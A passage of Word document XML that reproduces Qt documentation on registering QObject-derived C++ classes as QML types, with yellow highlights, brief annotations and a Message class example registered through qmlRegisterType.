        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering C++ Types with the QML Type System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
      <w:bookmarkEnd w:id="255"/>
      <w:bookmarkEnd w:id="256"/>
      <w:bookmarkEnd w:id="257"/>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2E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="002E5218">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r w:rsidRPr="002E5218">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class can be registered with the QML type system</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable the type to be used as a data type from within QML code.</w:t>
      </w:r>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The engine </w:t>
      </w:r>
      <w:r w:rsidRPr="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows the registration of both instantiable and non-instantiable types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering an instantiable type enables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a C++ class to be used as the definition of a QML object type, allowing it to be used in object declarations from QML code to create objects of this type. </w:t>
      </w:r>
      <w:r w:rsidRPr="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registration also provides the engine with additional type metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, enabling the type (and any enums declared by the class) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to be used as a data type for property values, method parameters and return values, and signal parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are exchanged between QML and C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="002E5218" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering a non-instantiable type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> also registers the class as a data type in this manner, but the type cannot be used instantiated as a QML object type from QML. This is useful, for example, if a type has enums that should be exposed to QML but the type itself should not be instantiable.</w:t>
      </w:r>
      <w:r w:rsidR="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E5218" w:rsidRPr="002E5218">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using context of this feature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00B170D3">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="registering-an-instantiable-object-type"/>
      <w:bookmarkStart w:id="259" w:name="_Toc483000587"/>
      <w:bookmarkStart w:id="260" w:name="_Toc483003608"/>
      <w:bookmarkStart w:id="261" w:name="_Toc483603939"/>
      <w:bookmarkStart w:id="262" w:name="_Toc483605159"/>
      <w:bookmarkEnd w:id="258"/>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering an Instantiable Object Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
      <w:bookmarkEnd w:id="260"/>
      <w:bookmarkEnd w:id="261"/>
      <w:bookmarkEnd w:id="262"/>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B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3" w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId190" w:history="1">
        <w:r w:rsidRPr="00B170D3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived C++ class can be registered as the definition of a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidRPr="00B170D3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Once a class is registered with the QML type system, the class can be declared and instantiated like any other object type from QML code. Once created, a class instance can be manipulated from QML; as</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exposing Attributes of C++ Types to QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explains, the properties, methods and signals of any</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId193" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class are accessible from QML code.</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To register a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId194" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class as an instantiable QML object type, call</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId195" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to register the class as QML type into a particular type namespace. Clients can then import that namespace in order to use the type.</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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, suppose there is a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class with</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author</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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creationDate</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties:</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Message : </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</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QObject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 xml:space="preserve">    Q_OBJECT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 xml:space="preserve">    Q_PROPERTY(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QString</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> author READ author WRITE setAuthor NOTIFY authorChanged)</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 xml:space="preserve">    Q_PROPERTY(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QDateTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creationDate READ creationDate WRITE setCreationDate NOTIFY creationDateChanged)</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ...</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00B307B1" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This type can be registered by calling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId196" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() with an appropriate type namespace and version number. For example, to make the type available in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com.mycompany.messaging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace with version 1.0:</w:t>
      </w:r>
      <w:r w:rsidR="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B307B1" w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlRegisterType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"com.mycompany.messaging"</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0</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"Message"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B307B1" w:rsidRDefault="00B307B1" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
